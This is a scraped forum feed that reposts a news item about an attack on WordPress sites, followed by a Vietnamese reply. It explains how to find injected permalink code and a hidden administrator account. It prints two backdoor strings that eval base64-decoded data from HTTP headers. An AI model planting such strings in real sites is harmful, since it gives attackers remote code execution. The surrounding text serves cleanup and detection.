<![CDATA[Latest posts for the topic "WordPress SQL Injection – Latest Attack"]]> /hvaonline/posts/list/13.html JForum - http://www.jforum.net WordPress SQL Injection – Latest Attack http://www.wpbeginner.com/news/wordpress-sql-injection-latest-attack/ A lot of sites are being hit by a recent SQL attack where codes are being injected to your site. This MySQL injection affects your permalinks by making them ineffective. As a result, your blog posts urls will not work. Numerous WordPress blogs were targetted in this attack, Thanks to Andy Soward for bringing this to our attention. There was one of the following codes that were added to your permalink structure due to this attack: Code:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%

    “/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECcode%5D))%7D%7D|.+)&%
These quotes appended all permalinks on your site and it can only be changed if removed manually. To fix this go to: Settings > Permalinks and remove the above code and replace your default code. Next thing you need to do is go to Users. You will see that there are more than one administrator. You won’t see their name listed, but you will see the count increased. So what you need to do is look at all users and find the last one who registered. Put your mouse over that user and get the link. Change the code userid= by adding 1 to that number. So if the last user who you can see was user #2 then add 1 to it and make it 3. You should find the hidden admin has a weird code as a first name. Delete the code and make him a subscriber. Then return and delete him. This should fix the problem. You can also delete him by simply going to your PHPMyAdmin. Because you will see the user there. We just wanted to get this news out as soon as we can, so our users can be updated. Please make sure that you check that your blog is not infected. We hope that WordPress come out with a release soon. Also if you haven’t implement some of these measures to secure your http://www.wpbeginner.com/wp-tutorials/11-vital-tips-and-hacks-to-protect-your-wordpress-admin-area/ ]]> /hvaonline/posts/list/31134.html#191992 /hvaonline/posts/list/31134.html#191992 GMT WordPress SQL Injection – Latest Attack Code:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%
Code:
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECcode%5D))%7D%7D|.+)&%
Một cách khác để nhận biết là có một số thành viên lạ trong blog của bạn. Thí dụ, bạn là quản trị duy nhất, nhưng bảng điều khiển hiển thị Administrator (2). Để khắc phục, bạn cần phải tìm và xóa các thành viên khả nghi, tìm các bài viết có chứa chuỗi “eval” và tìm sửa thủ công các url bị virus sửa đổi. Lỗ hổng bảo mật này đã được sớm phát hiện và khắc phục trong bản 2.8.4 (ra mắt ngày 12/8).]]> /hvaonline/posts/list/31134.html#192152 /hvaonline/posts/list/31134.html#192152 GMT WordPress SQL Injection – Latest Attack /hvaonline/posts/list/31134.html#192268 /hvaonline/posts/list/31134.html#192268 GMT